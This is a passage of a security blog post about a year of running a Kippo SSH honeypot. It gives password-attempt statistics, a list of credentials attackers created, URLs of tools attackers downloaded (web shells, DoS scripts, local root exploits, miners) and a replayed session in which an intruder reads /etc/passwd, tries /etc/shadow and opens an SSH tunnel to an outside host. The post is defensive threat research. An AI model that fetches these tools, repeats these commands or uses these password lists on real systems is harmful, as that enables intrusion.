compiled differently than what appears below. To review, open the file in an
editor that reveals hidden Unicode characters. Learn more about bidirectional
Unicode characters
Show hidden characters

remnux@remnux:~/custom_tools/pipal$ ./pipal.rb ../TekDefense/wordlist.txt
Generating stats, hit CTRL-C to finish early and dump stats on words already
processed. Basic Results Total entries = 203400 Total unique entries = 75627 Top
10 passwords 123456 = 3561 (1.75%) 12345 = 1550 (0.76%) password = 1539 (0.76%)
changeme = 1303 (0.64%) 1234 = 1231 (0.61%) test = 1165 (0.57%) abc123 = 1000
(0.49%) 123 = 766 (0.38%) qwerty = 586 (0.29%) root = 529 (0.26%) Top 10 base
words root = 2256 (1.11%) password = 2178 (1.07%) test = 1853 (0.91%) admin =
1538 (0.76%) changeme = 1391 (0.68%) qwerty = 1114 (0.55%) oracle = 802 (0.39%)
p@ssw0rd = 709 (0.35%) qaz2wsx = 708 (0.35%) qwer = 591 (0.29%) Password length
(length ordered) 1 = 2247 (1.1%) 2 = 1539 (0.76%) 3 = 5589 (2.75%) 4 = 15420
(7.58%) 5 = 17910 (8.81%) 6 = 38125 (18.74%) 7 = 23075 (11.34%) 8 = 33164
(16.3%) 9 = 18631 (9.16%) 10 = 14059 (6.91%) 11 = 8525 (4.19%) 12 = 8627 (4.24%)
13 = 3759 (1.85%) 14 = 2617 (1.29%) 15 = 2025 (1.0%) 16 = 1786 (0.88%) 17 = 826
(0.41%) 18 = 1256 (0.62%) 19 = 520 (0.26%) 20 = 892 (0.44%) 21 = 275 (0.14%) 22
= 190 (0.09%) 23 = 303 (0.15%) 24 = 386 (0.19%) 25 = 172 (0.08%) 26 = 181
(0.09%) 27 = 56 (0.03%) 28 = 77 (0.04%) 29 = 47 (0.02%) 30 = 67 (0.03%) 31 = 111
(0.05%) 32 = 261 (0.13%) 33 = 96 (0.05%) 34 = 90 (0.04%) 35 = 117 (0.06%) 36 =
75 (0.04%) 37 = 19 (0.01%) 38 = 22 (0.01%) 39 = 30 (0.01%) 40 = 9 (0.0%) 41 = 73
(0.04%) 42 = 7 (0.0%) 43 = 3 (0.0%) 44 = 12 (0.01%) 45 = 16 (0.01%) 46 = 15
(0.01%) 47 = 9 (0.0%) 48 = 9 (0.0%) 49 = 20 (0.01%) 50 = 5 (0.0%) 51 = 7 (0.0%)
52 = 8 (0.0%) 54 = 2 (0.0%) 56 = 22 (0.01%) 57 = 1 (0.0%) 60 = 1 (0.0%) 62 = 3
(0.0%) 63 = 1 (0.0%) 64 = 4 (0.0%) 66 = 1 (0.0%) 69 = 2 (0.0%) 71 = 3 (0.0%)
Password length (count ordered) 6 = 38125 (18.74%) 8 = 33164 (16.3%) 7 = 23075
(11.34%) 9 = 18631 (9.16%) 5 = 17910 (8.81%) 4 = 15420 (7.58%) 10 = 14059
(6.91%) 12 = 8627 (4.24%) 11 = 8525 (4.19%) 3 = 5589 (2.75%) 13 = 3759 (1.85%)
14 = 2617 (1.29%) 1 = 2247 (1.1%) 15 = 2025 (1.0%) 16 = 1786 (0.88%) 2 = 1539
(0.76%) 18 = 1256 (0.62%) 20 = 892 (0.44%) 17 = 826 (0.41%) 19 = 520 (0.26%) 24
= 386 (0.19%) 23 = 303 (0.15%) 21 = 275 (0.14%) 32 = 261 (0.13%) 22 = 190
(0.09%) 26 = 181 (0.09%) 25 = 172 (0.08%) 35 = 117 (0.06%) 31 = 111 (0.05%) 33 =
96 (0.05%) 34 = 90 (0.04%) 28 = 77 (0.04%) 36 = 75 (0.04%) 41 = 73 (0.04%) 30 =
67 (0.03%) 27 = 56 (0.03%) 29 = 47 (0.02%) 39 = 30 (0.01%) 38 = 22 (0.01%) 56 =
22 (0.01%) 49 = 20 (0.01%) 37 = 19 (0.01%) 45 = 16 (0.01%) 46 = 15 (0.01%) 44 =
12 (0.01%) 47 = 9 (0.0%) 40 = 9 (0.0%) 48 = 9 (0.0%) 52 = 8 (0.0%) 51 = 7 (0.0%)
42 = 7 (0.0%) 50 = 5 (0.0%) 64 = 4 (0.0%) 43 = 3 (0.0%) 62 = 3 (0.0%) 71 = 3
(0.0%) 54 = 2 (0.0%) 69 = 2 (0.0%) 63 = 1 (0.0%) 66 = 1 (0.0%) 60 = 1 (0.0%) 57
= 1 (0.0%) | | | | | | | | | | ||| ||| ||||| |||||| ||||||| ||||||| |||||||||
|||||||||| ||||||||||||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
000000000011111111112222222222333333333344444444445555555555666666666677
012345678901234567890123456789012345678901234567890123456789012345678901 One to
six characters = 80830 (39.74%) One to eight characters = 137069 (67.39'%) More
than eight characters = 66331 (32.61%) Only lowercase alpha = 83305 (40.96%)
Only uppercase alpha = 659 (0.32%) Only alpha = 83964 (41.28%) Only numeric =
23069 (11.34%) First capital last symbol = 1318 (0.65%) First capital last
number = 4224 (2.08%) Single digit on the end = 10990 (5.4%) Two digits on the
end = 5787 (2.85%) Three digits on the end = 19356 (9.52%) Last number 0 = 5035
(2.48%) 1 = 9472 (4.66%) 2 = 5868 (2.88%) 3 = 21244 (10.44%) 4 = 6911 (3.4%) 5 =
5498 (2.7%) 6 = 8139 (4.0%) 7 = 3273 (1.61%) 8 = 3836 (1.89%) 9 = 3934 (1.93%) |
| | | | | | | | | | | | | || | |||||| ||||||| |||||||||| |||||||||| ||||||||||
0123456789 Last digit 3 = 21244 (10.44%) 1 = 9472 (4.66%) 6 = 8139 (4.0%) 4 =
6911 (3.4%) 2 = 5868 (2.88%) 5 = 5498 (2.7%) 0 = 5035 (2.48%) 9 = 3934 (1.93%) 8
= 3836 (1.89%) 7 = 3273 (1.61%) Last 2 digits (Top 10) 23 = 17068 (8.39%) 56 =
5973 (2.94%) 34 = 3792 (1.86%) 45 = 2980 (1.47%) 12 = 2109 (1.04%) 21 = 2072
(1.02%) 11 = 1976 (0.97%) 89 = 1578 (0.78%) 00 = 1135 (0.56%) 10 = 1016 (0.5%)
Last 3 digits (Top 10) 123 = 16664 (8.19%) 456 = 5829 (2.87%) 234 = 3705 (1.82%)
345 = 2588 (1.27%) 321 = 1513 (0.74%) 111 = 1189 (0.58%) 789 = 1168 (0.57%) 678
= 758 (0.37%) 000 = 703 (0.35%) 567 = 672 (0.33%) Last 4 digits (Top 10) 3456 =
5452 (2.68%) 1234 = 3635 (1.79%) 2345 = 2578 (1.27%) 1111 = 980 (0.48%) 6789 =
858 (0.42%) 5678 = 737 (0.36%) 4321 = 656 (0.32%) 4567 = 649 (0.32%) 3123 = 643
(0.32%) 7890 = 496 (0.24%) Last 5 digits (Top 10) 23456 = 5439 (2.67%) 12345 =
2571 (1.26%) 56789 = 852 (0.42%) 11111 = 842 (0.41%) 45678 = 710 (0.35%) 34567 =
643 (0.32%) 23123 = 607 (0.3%) 54321 = 508 (0.25%) 67890 = 483 (0.24%) 00000 =
302 (0.15%) Character sets loweralpha: 83305 (40.96%) loweralphanum: 53690
(26.4%) numeric: 23069 (11.34%) mixedalphanum: 8112 (3.99%)
loweralphaspecialnum: 7073 (3.48%) loweralphaspecial: 5802 (2.85%)
mixedalphaspecialnum: 4159 (2.04%) mixedalpha: 3041 (1.5%) specialnum: 1849
(0.91%) special: 1738 (0.85%) upperalphanum: 1117 (0.55%) mixedalphaspecial:
1017 (0.5%) upperalphaspecial: 749 (0.37%) upperalpha: 659 (0.32%)
upperalphaspecialnum: 364 (0.18%) Character set ordering allstring: 87005
(42.78%) stringdigit: 35764 (17.58%) othermask: 35359 (17.38%) alldigit: 23069
(11.34%) stringdigitstring: 6280 (3.09%) digitstring: 4939 (2.43%)
stringspecialstring: 2298 (1.13%) stringspecial: 2217 (1.09%)
stringspecialdigit: 1809 (0.89%) digitstringdigit: 1756 (0.86%) allspecial: 1738
(0.85%) specialstring: 831 (0.41%) specialstringspecial: 335 (0.16%)

view raw Password Statistics from Kippo Honeypot using Pipal hosted with ❤ by
GitHub



Two items of note here are that over 60% of password attempts were 1-8
characters. 40% of attempts were for lowercase alpha characters only. The most
used password was 123456. This is the default pass for Kippo.

If a user attempts to create an account or change the root password in a Kippo
session those passwords are captured and added to the allowed credentials list.
The following credentials were created:

> root:0:albertinoalbert123
> root:0:fgashyeq77dhshfa
> root:0:florian12eu
> root:0:hgd177q891999wwwwwe1.dON
> root:0:iphone5
> root:0:kokot
> root:0:nope
> root:0:picvina
> root:0:scorpi123
> root:0:test
> root:0:xiaozhe
> root:0:12345
> root:0:bnn318da9031kdamfaihheq1fa
> root:0:ls
> root:0:neonhostt1
> root:0:wget123


DOWNLOADS:


When an attacker attempts to download a tool via wget, within Kippo we allow
that file to be downloaded, although they cannot interact with it. With this we
are able to get a copy of whatever is being downloaded. In most cases these are
IRC bots, but not all. I have made them all available for download.

Here is a listing of all the files:
*Duplicates and obviously legitimate files have been removed from the list.
> 20131030113401_http___198_2_192_204_22_disknyp
> 20131103183232_http___61_132_227_111_8080_meimei
> 20131104045744_http___198_2_192_204_22_disknyp
> 20131114214017_http___www_unrealircd_com_downloads_Unreal3_2_8_1_tar_gz
> 20131116130541_http___198_2_192_204_22_disknyp
> 20131129165151_http___dl_dropboxusercontent_com_s_1bxj9ak8m1octmk_ktx_c
> 20131129165438_http___dl_dropboxusercontent_com_s_66gpt66lvut4gdu_ktx
> 20131202040921_http___198_2_192_204_22_disknyp
> 20131207123419_http___packetstorm_wowhacker_com_DoS_juno_c
> 20131216143108_http___www_psybnc_at_download_beta_psyBNC_2_3_2_7_tar_gz
> 20131216143208_http___X_hackersoft_org_scanner_gosh_jpg
> 20131216143226_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
> 20131217163423_http___ha_ckers_org_slowloris_slowloris_pl
> 20131217163456_http___www_lemarinel_net_perl
> 20131222084315_http___maxhub_com_auto_bill_pipe_bot
> 20140103142644_http___ftp_gnu_org_gnu_autoconf_autoconf_2_69_tar_gz
> 20140109170001_http___sourceforge_net_projects_cpuminer_files_pooler_cpuminer_2_3_2_linux_x86_tar_gz
> 20140120152204_http___111_39_43_54_5555_dos32
> 20140122202342_http___layer1_cpanel_net_latest
> 20140122202549_http___linux_duke_edu_projects_yum_download_2_0_yum_2_0_7_tar_gz
> 20140122202751_http___www_ehcp_net_ehcp_latest_tgz
> 20140201131804_http___www_suplementar_com_br_images_stories_goon_pooler_cpuminer_2_3_2_tar_gz
> 20140201152307_http___nemo_rdsor_ro_darwin_jpg
> 20140208081358_http___www_youtube_com_watch_v_6hVQs5ll064
> 20140208184835_http___sharplase_ru_x_txt
> 20140215141909_http___tenet_dl_sourceforge_net_project_cpuminer_pooler_cpuminer_2_3_2_tar_gz
> 20140215142830_http___sourceforge_net_projects_cpuminer_files_pooler_cpuminer_2_3_2_tar_gz
> 20140219072721_http___www_psybnc_at_download_beta_psyBNC_2_3_2_7_tar_gz
> 20140328031725_http___dl_dropboxusercontent_com_u_133538399_multi_py
> 20140409053322_http___www_c99php_com_shell_c99_rar
> 20140409053728_http___github_com_downloads_orbweb_PHP_SHELL_WSO_wso2_5_1_php
> 20140413130110_http___www_iphobos_com_hb_unixcod_rar
> 20140416194008_http___linux_help_bugs3_com_Camel_mail_txt
> 20140419143734_http___www_activestate_com_activeperl_downloads_thank_you_dl_http___downloads_activestate_com_ActivePerl_releases_5_18_2_1802_ActivePerl_5_18_2_1802_x86_64_linux_glibc_2_5_298023_tar_gz
> 20140419144043_http___ha_ckers_org_slowloris_slowloris_pl
> 20140420104056_http___downloads_metasploit_com_data_releases_archive_metasploit_4_9_2_linux_x64_installer_run
> 20140420104325_http___nmap_org_dist_nmap_6_46_1_i386_rpm
> 20140505073503_http___116_255_239_180_888_007
> 20140505093229_http___119_148_161_25_805_sd32
> 20140505111511_http___112_117_223_10_280_1
> 20140515091557_http___112_117_223_10_280__bash_6_phpmysql
> 20140519193800_http___www_unrealircd_com_downloads_Unreal3_2_8_1_tar_gz
> 20140523120411_http___lemonjuice_tk_netcat_sh
> 20140610174516_http___59_63_183_193_280__etc_Test8888
> 20140614200901_http___kismetismy_name_ktx
> 20140625032113_http___ftp_mirrorservice_org_sites_ftp_wiretapped_net_pub_security_packet_construction_netcat_gnu_netcat_netcat_0_7_1_tar_gz
> 20140720005010_http___www_bl4ck_viper_persiangig_com_p8_localroots_2_6_x_cw7_3

To see the full source for some of the scripts downloaded by the attackers you
can go to this Github Repo. A couple of my favorite ones.



TTY REPLAY SESSIONS:

My absolute favorite feature of Kippo is the ability to replay interactive
sessions of attacker activity. Watching these replays gives us an idea of what
attackers do once inside a session. For instance almost every session begins
with a "w" which shows logged in users and uptime, and then a "uname -a" to show
them system details. I made a Youtube series called The Kippo Kronicles a while
back to showcase some of these sessions. While I don't have the time necessary
to continue putting up videos for each session I have put the output of each
session up at this Github Repo.

Here is a fun example:
> AWSWeb:~# adduser
> adduser: Only one or two names allowed.
> AWSWeb:~# useradd
> adduser: Only one or two names allowed.
> AWSWeb:~# ls
> AWSWeb:~# pwd
> root
> AWSWeb:~# cd /cat /etc/passwd
> root:x:0:0:root:/root:/bin/bash
> daemon:x:1:1:daemon:/usr/sbin:/bin/sh
> bin:x:2:2:bin:/bin:/bin/sh
> sys:x:3:3:sys:/dev:/bin/sh
> sync:x:4:65534:sync:/bin:/bin/sync
> games:x:5:60:games:/usr/games:/bin/sh
> man:x:6:12:man:/var/cache/man:/bin/sh
> lp:x:7:7:lp:/var/spool/lpd:/bin/sh
> mail:x:8:8:mail:/var/mail:/bin/sh
> news:x:9:9:news:/var/spool/news:/bin/sh
> uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
> proxy:x:13:13:proxy:/bin:/bin/sh
> www-data:x:33:33:www-data:/var/www:/bin/sh
> backup:x:34:34:backup:/var/backups:/bin/sh
> list:x:38:38:Mailing List Manager:/var/list:/bin/sh
> irc:x:39:39:ircd:/var/run/ircd:/bin/sh
> gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
> nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
> libuuid:x:100:101::/var/lib/libuuid:/bin/sh
> richard:x:1000:1000:richard,,,:/home/richard:/bin/bash
> sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
> AWSWeb:~# user
> bash: user: command not found
> AWSWeb:~# adduser obz
> Adding user `obz' ...
> Adding new group `obz' (1001) ...
> Adding new user `obz' (1001) with group `obz' ...
> Creating home directory `/home/obz' ...
> Copying files from `/etc/skel' ...
> Password: 
> Password again: 
> 
> Changing the user information for obz
> Enter the new value, or press ENTER for the default
>         Username []: 
> Must enter a value!
>         Username []: obz
>         Full Name []: ladmin obz
>         Room Number []: 1
>         Work Phone []: 1234567890
>         Home Phone []: 
> Must enter a value!
>         Home Phone []: 0
>         Mobile Phone []: 0
>         Country []: cn
>         City []: xang
>         Language []: mand
>         Favorite movie []: 1
>         Other []: 1
> Is the information correct? [Y/n] y
> ERROR: Some of the information you entered is invalid
> Deleting user `obz' ...
> Deleting group `obz' (1001) ...
> Deleting home directory `/home/obz' ...
> Try again? [Y/n] y
> 
> Changing the user information for obz
> Enter the new value, or press ENTER for the default
>         Username []: obx
>         Full Name []: obx toor
>         Room Number []: 1
>         Work Phone []: 19089543121
>         Home Phone []: 9089342135
>         Mobile Phone []: 9089439012
>         Country []: cn
>         City []: xang
>         Language []: manenglish
>         Favorite movie []: one
>         Other []: twofour
> Is the information correct? [Y/n] y
> ERROR: Some of the information you entered is invalid
> Deleting user `obz' ...
> Deleting group `obz' (1001) ...
> Deleting home directory `/home/obz' ...
> Try again? [Y/n] n
> AWSWeb:~# cat adduser obz user cat /etc/passwd
> root:x:0:0:root:/root:/bin/bash
> daemon:x:1:1:daemon:/usr/sbin:/bin/sh
> bin:x:2:2:bin:/bin:/bin/sh
> sys:x:3:3:sys:/dev:/bin/sh
> sync:x:4:65534:sync:/bin:/bin/sync
> games:x:5:60:games:/usr/games:/bin/sh
> man:x:6:12:man:/var/cache/man:/bin/sh
> lp:x:7:7:lp:/var/spool/lpd:/bin/sh
> mail:x:8:8:mail:/var/mail:/bin/sh
> news:x:9:9:news:/var/spool/news:/bin/sh
> uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
> proxy:x:13:13:proxy:/bin:/bin/sh
> www-data:x:33:33:www-data:/var/www:/bin/sh
> backup:x:34:34:backup:/var/backups:/bin/sh
> list:x:38:38:Mailing List Manager:/var/list:/bin/sh
> irc:x:39:39:ircd:/var/run/ircd:/bin/sh
> gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
> nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
> libuuid:x:100:101::/var/lib/libuuid:/bin/sh
> richard:x:1000:1000:richard,,,:/home/richard:/bin/bash
> sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
> AWSWeb:~# cat /etc/shadow
> cat: /etc/shadow: No such file or directory
> AWSWeb:~# /etc/init.d\D/ssh start
> bash: /etc/init.D/ssh: command not found
> AWSWeb:~# /etc/init.D/ssh
> startd
> bash: /etc/init.d/ssh: command not found
> AWSWeb:~# 
> AWSWeb:~# 
> AWSWeb:~# 
> AWSWeb:~# 
> AWSWeb:~# 
> AWSWeb:~# 
> AWSWeb:~# 
> AWSWeb:~# 
> AWSWeb:~# 
> AWSWeb:~# exit
> cConnection to server closed.
> localhost:~# exit
> Connection to server closed.
> localhost:~# bye
> bash: bye: command not found
> localhost:~# exit
> Connection to server closed.
> localhost:~# admin
> bash: admin: command not found
> localhost:~# su
> localhost:~# ls -l
> drwxr-xr-x 1 root root 4096 2013-02-03 17:11 .
> drwxr-xr-x 1 root root 4096 2013-02-03 17:11 ..
> drwxr-xr-x 1 root root 4096 2009-11-06 11:16 .debtags
> -rw------- 1 root root 5515 2009-11-20 09:08 .viminfo
> drwx------ 1 root root 4096 2009-11-06 11:13 .aptitude
> -rw-r--r-- 1 root root  140 2009-11-06 11:09 .profile
> -rw-r--r-- 1 root root  412 2009-11-06 11:09 .bashrc
> localhost:~# pwd
> /root
> localhost:~# cd /
> localhost:/# ls -l
> drwxr-xr-x 1 root root  4096 2013-02-03 17:11 .
> drwxr-xr-x 1 root root  4096 2013-02-03 17:11 ..
> drwxr-xr-x 1 root root     0 2009-11-20 08:19 sys
> drwxr-xr-x 1 root root  4096 2009-11-08 15:42 bin
> drwxr-xr-x 1 root root  4096 2009-11-06 11:08 mnt
> drwxr-xr-x 1 root root  4096 2009-11-06 11:08 media
> lrwxrwxrwx 1 root root    25 2009-11-06 11:16 vmlinuz ->
> /boot/vmlinuz-2.6.26-2-686
> drwxr-xr-x 1 root root  4096 2009-11-06 11:09 opt
> lrwxrwxrwx 1 root root    11 2009-11-06 11:08 cdrom -> /media/cdrom0
> drwxr-xr-x 1 root root  4096 2009-11-06 11:08 selinux
> drwxrwxrwx 1 root root  4096 2009-11-20 08:19 tmp
> dr-xr-xr-x 1 root root     0 2009-11-20 08:19 proc
> drwxr-xr-x 1 root root  4096 2009-11-08 15:41 sbin
> drwxr-xr-x 1 root root  4096 2009-11-20 08:20 etc
> drwxr-xr-x 1 root root  3200 2009-11-20 08:20 dev
> drwxr-xr-x 1 root root  4096 2009-11-06 11:09 srv
> lrwxrwxrwx 1 root root    28 2009-11-06 11:16 initrd.img ->
> /boot/initrd.img-2.6.26-2-686
> drwxr-xr-x 1 root root  4096 2009-11-08 15:46 lib
> drwxr-xr-x 1 root root  4096 2009-11-06 11:22 home
> drwxr-xr-x 1 root root  4096 2009-11-06 11:09 var
> drwxr-xr-x 1 root root  4096 2009-11-08 15:46 usr
> drwxr-xr-x 1 root root  4096 2009-11-08 15:39 boot
> drwxr-xr-x 1 root root  4096 2009-11-20 09:08 root
> drwx------ 1 root root 16384 2009-11-06 11:08 lost+found
> localhost:/# cd /home
> localhost:/home# ls -l
> ldrwxr-xr-x 1 root root 4096 2013-02-03 17:11 .
> drwxr-xr-x 1 root root 4096 2013-02-03 17:11 ..
> drwxr-xr-x 1 1000 1000 4096 2009-11-06 11:22 richard
> localhost:/home# exit
> Connection to server closed.
> localhost:~# 
> localhost:~# 
> localhost:~# 
> localhost:~# 
> localhost:~# 
> localhost:~# 
> localhost:~# ssh -D root@http://60.250.65.112/ 1337
> The authenticity of host '60.250.65.112 (60.250.65.112)' can't be
> established.
> RSA key fingerprint is 9d:30:97:8a:9e:48:0d:de:04:8d:76:3a:7b:4b:30:f8.
> Are you sure you want to continue connecting (yes/no)? yes
> Warning: Permanently added '60.250.65.112' (RSA) to the list of known hosts.
> root@60.250.65.112's password: 
> Linux localhost 2.6.26-2-686 #1 SMP Wed Nov 4 20:45:37 UTC 2009 i686
> Last login: Sat Feb  2 07:07:11 2013 from 192.168.9.4
> localhost:~# uname -a
> Linux localhost 2.6.24-2-generic #1 SMP Thu Dec 20 17:36:12 GMT 2007 i686
> GNU/Linux
> localhost:~# pwd
> /root
> localhost:~# cd /
> localhost:/# ls -l
> drwxr-xr-x 1 root root  4096 2013-02-03 17:19 .
> drwxr-xr-x 1 root root  4096 2013-02-03 17:19 ..
> drwxr-xr-x 1 root root     0 2009-11-20 08:19 sys
> drwxr-xr-x 1 root root  4096 2009-11-08 15:42 bin
> drwxr-xr-x 1 root root  4096 2009-11-06 11:08 mnt
> drwxr-xr-x 1 root root  4096 2009-11-06 11:08 media
> lrwxrwxrwx 1 root root    25 2009-11-06 11:16 vmlinuz ->
> /boot/vmlinuz-2.6.26-2-686
> drwxr-xr-x 1 root root  4096 2009-11-06 11:09 opt
> lrwxrwxrwx 1 root root    11 2009-11-06 11:08 cdrom -> /media/cdrom0
> drwxr-xr-x 1 root root  4096 2009-11-06 11:08 selinux
> drwxrwxrwx 1 root root  4096 2009-11-20 08:19 tmp
> dr-xr-xr-x 1 root root     0 2009-11-20 08:19 proc
> drwxr-xr-x 1 root root  4096 2009-11-08 15:41 sbin
> drwxr-xr-x 1 root root  4096 2009-11-20 08:20 etc
> drwxr-xr-x 1 root root  3200 2009-11-20 08:20 dev
> drwxr-xr-x 1 root root  4096 2009-11-06 11:09 srv
> lrwxrwxrwx 1 root root    28 2009-11-06 11:16 initrd.img ->
> /boot/initrd.img-2.6.26-2-686
> drwxr-xr-x 1 root root  4096 2009-11-08 15:46 lib
> drwxr-xr-x 1 root root  4096 2009-11-06 11:22 home
> drwxr-xr-x 1 root root  4096 2009-11-06 11:09 var
> drwxr-xr-x 1 root root  4096 2009-11-08 15:46 usr
> drwxr-xr-x 1 root root  4096 2009-11-08 15:39 boot
> drwxr-xr-x 1 root root  4096 2009-11-20 09:08 root
> drwx------ 1 root root 16384 2009-11-06 11:08 lost+found
> localhost:/# cd /root
> localhost:~# ls -l
> ldrwxr-xr-x 1 root root 4096 2013-02-03 17:19 .
> drwxr-xr-x 1 root root 4096 2013-02-03 17:19 ..
> drwxr-xr-x 1 root root 4096 2009-11-06 11:16 .debtags
> -rw------- 1 root root 5515 2009-11-20 09:08 .viminfo
> drwx------ 1 root root 4096 2009-11-06 11:13 .aptitude
> -rw-r--r-- 1 root root  140 2009-11-06 11:09 .profile
> -rw-r--r-- 1 root root  412 2009-11-06 11:09 .bashrc
> localhost:~# cd /hocd /home/
> localhost:/home# ls -l
> drwxr-xr-x 1 root root 4096 2013-02-03 17:20 .
> drwxr-xr-x 1 root root 4096 2013-02-03 17:20 ..
> drwxr-xr-x 1 1000 1000 4096 2009-11-06 11:22 richard
> localhost:/home# exit
> Connection to server closed.
> localhost:~# exit
> Connection to server closed.
> localhost:~# 





 CONCLUSION:

After a year with Kippo, I have learned a lot about what these basic attackers
do when connecting to seemingly open ssh hosts. There is plenty more to learn
though. I have some plans on building out a larger honeypot infrastructure, and
automating some of the data collection and parsing. Additionally I would like to
spend more time analyzing the sessions and malware for further trends. I'll keep
you all posted!

*Big thanks to Bruteforce Labs for their tools and expertise in honeypots.

Admin | 1 Comment | Share Article
tagged Kippo, Pipal, honeypot, python, ssh in News


Page 1 2 3 4 5 ... 13 Next 5 Entries »
Copyright © 2011, TekDefense. All rights reserved.